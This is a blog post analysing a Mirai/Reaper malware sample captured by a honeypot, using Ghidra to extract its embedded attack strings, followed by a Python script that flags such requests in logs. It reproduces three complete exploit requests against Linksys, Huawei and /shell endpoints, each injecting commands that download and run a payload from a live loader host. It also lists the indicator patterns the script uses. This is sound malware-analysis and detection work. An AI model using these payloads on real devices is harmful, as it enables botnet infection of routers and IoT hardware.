In my previous post, I showed how I set up a honey pot to capture HTTP requests coming to my IP address. Some of the requests were from bots attempting to exploit vulnerabilities in order to gain access to devices and services; one of these requests attempted to inject shell commands to download and run malware.

I downloaded reap.mpsl using curl so we can have a closer look at what the attackers are trying to infect the honey pot with.

Uploading reap.mpsl to VirusTotal, we can see that it has been flagged as Mirai/Reaper malware by several antivirus engines; it was first submitted to VirusTotal on 2022-06-28.

Analysing with Ghidra


By using Ghidra we can disassemble and analyse the malware executable and see if it reveals any secrets. Looking at Ghidra's initial analysis we can see it is a 32-bit MIPS executable.

About Reaper

Strings


The first thing we are going to look at are the text strings compiled into the executable; plain-text strings give us an easy look into what the executable is doing and what resources it may attempt to use.
To do this, click Search -> For Strings... in the top menu bar; Ghidra will then search the executable for strings and display them.

Reaper Strings

Straight away we can see a string that was probably used to attack our honey pot: the highlighted string in the list starts with POST /tmUnblock.cgi, and looking back at my previous post we can see that /tmUnblock.cgi was the endpoint the malware was attempting to exploit. Directly below this string we can see what looks like another POST request, this time to /ctrlt/DeviceUpgrade_1, and further down there is a third that looks like a GET request to /shell with shell commands.
Next I will extract the strings that look like HTTP attacks so we can have a closer look at what they are trying to do.

Attack 1 (hit our honey pot)

Extracting the first suspicious string from Ghidra we can see it contains the following:

“POST /tmUnblock.cgi HTTP/1.1\r\nHost: 91.218.67.131:80\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: /\r\nUser-Agent: python-requests/2.20.0\r\nContent-Length: 227\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F91.218.67.131%2Freaper%2Freap.mpsl%3B+chmod+777+reap.mpsl%3B+.%2Freap.mpsl+Reaper.linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1”

Tidying it up (URL-decoding the body and removing the line breaks) to make it easier to read:

“POST /tmUnblock.cgi HTTP/1.1 Host: 91.218.67.131:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+cd+/tmp;+rm+-rf+mpsl;+wget+http://91.218.67.131/reaper/reap.mpsl;+chmod+777+reap.mpsl;+./reap.mpsl+Reaper.linksys&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1”

We can see that this string contains exactly what was picked up by the honey pot from one of the suspicious requests, which is a good indication that it was this malware executable (possibly running on someone's infected device) that made the request.

Attack 2 (POST to /ctrlt/DeviceUpgrade_1)

Extracting the second suspicious string we see it contains the following:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">$(busybox wget -g 91.218.67.131 -l /tmp/bigH -r /reaper/reap.mips;chmod 777 /tmp/bigH;/tmp/bigH huawei.rep.mips;rm -rf /tmp/bigH)$(echo HUAWEIUPNP)</u:Upgrade></s:Envelope>

This attack contains a Digest access authentication header using the username "dslf-config", which suggests that the malware is attempting to exploit default credentials that may be present on the device.

The body of this attack contains the following XML payload:

<?xml version="1.0" ?>
<s:Envelope
  xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <s:Body>
    <u:Upgrade
      xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
      <NewStatusURL>$(busybox wget -g 91.218.67.131 -l /tmp/bigH -r /reaper/reap.mips;chmod 777 /tmp/bigH;/tmp/bigH huawei.rep.mips;rm -rf /tmp/bigH)</NewStatusURL>
      <NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>
    </u:Upgrade>
  </s:Body>
</s:Envelope>

The XML data is likely consumed by the device's upgrade process, and the $( ... ) command substitution in the NewStatusURL value would cause the device to download and run reap.mips.

Attack 3 (GET to /shell)

Extracting the third suspicious string we see it contains the following:

GET /shell?cd+/tmp;rm+-rf+;wget+ 91.218.67.131/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive

This attack performs an HTTP GET request to /shell with the following parameter: cd+/tmp;rm+-rf+*;wget+ 91.218.67.131/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4. Again, this command will download and run reap.arm4, which is the same malware as seen before but compiled to run on arm4 processors.
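As an added example (not code from the original post), the following Python script does for honeypot logs what was done by hand for attacks 1 to 3 above: it URL-decodes the injected parameters, flags the download-and-execute pattern the three requests share, and pulls out the loader host so it can be blocked or pivoted on. The sample requests are constructed from the strings on this page, trimmed to the headers that matter for parsing.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed samples modelled on the three strings extracted above.
ATTACK_LINKSYS = (
    "POST /tmUnblock.cgi HTTP/1.1\r\nHost: 91.218.67.131:80\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F91.218.67.131"
    "%2Freaper%2Freap.mpsl%3B+chmod+777+reap.mpsl%3B+.%2Freap.mpsl+Reaper.linksys%60"
    "&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1")
ATTACK_HUAWEI = (
    "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nConnection: keep-alive\r\n\r\n"
    '<?xml version="1.0" ?><s:Envelope><u:Upgrade>$(busybox wget -g 91.218.67.131 '
    "-l /tmp/bigH -r /reaper/reap.mips;chmod 777 /tmp/bigH;/tmp/bigH huawei.rep.mips;"
    "rm -rf /tmp/bigH)$(echo HUAWEIUPNP)</u:Upgrade></s:Envelope>")
ATTACK_SHELL = (
    "GET /shell?cd+/tmp;rm+-rf+*;wget+ 91.218.67.131/reaper/reap.arm4;"
    "chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n")

# Indicators shared by all three payloads: command substitution, a downloader,
# making the dropped file executable, and commands chained with ';'. LOADER_HOST
# picks up the host a wget URL, "busybox wget -g" or a bare wget fetches from.
INDICATORS = {
    "substitution": re.compile(r"\$\(|`"),
    "downloader": re.compile(r"\b(?:wget|curl|tftp)\b"),
    "make_exec": re.compile(r"\bchmod\s+[0-7]{3,4}\b"),
    "chaining": re.compile(r";\s*(?:rm|wget|chmod|sh|\./|/tmp/)"),
}
LOADER_HOST = re.compile(r"(?:wget|curl|-g)\s+(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})")

def decode_fields(raw):
    """Return (method, path, {field: decoded text}). The request line is parsed
    leniently: the /shell target above has a stray space a strict parser rejects."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, _, headers = head.partition("\r\n")
    method, _, rest = request_line.partition(" ")
    parts = urlsplit(rest.rsplit(" HTTP/", 1)[0])
    fields = {"query": unquote_plus(parts.query)} if parts.query else {}
    if "application/x-www-form-urlencoded" in headers.lower():
        for name, values in parse_qs(body, keep_blank_values=True).items():
            fields["form:" + name] = " ".join(values)  # ttcp_ip lands here
    elif body:
        fields["body"] = body  # e.g. the SOAP XML of attack 2
    return method, parts.path, fields

def analyse(raw):
    """Classify one request and extract the loader host to block or pivot on."""
    method, path, fields = decode_fields(raw)
    hits = {n for t in fields.values() for n, rx in INDICATORS.items() if rx.search(t)}
    hosts = {m.group(1) for t in fields.values() for m in LOADER_HOST.finditer(t)}
    return {"method": method, "path": path, "indicators": sorted(hits),
            "loader_hosts": sorted(hosts), "suspicious": len(hits) >= 2}
```

Requiring two independent indicators keeps a lone "wget" in a legitimate form value from firing, while each of the three loader requests above trips at least three.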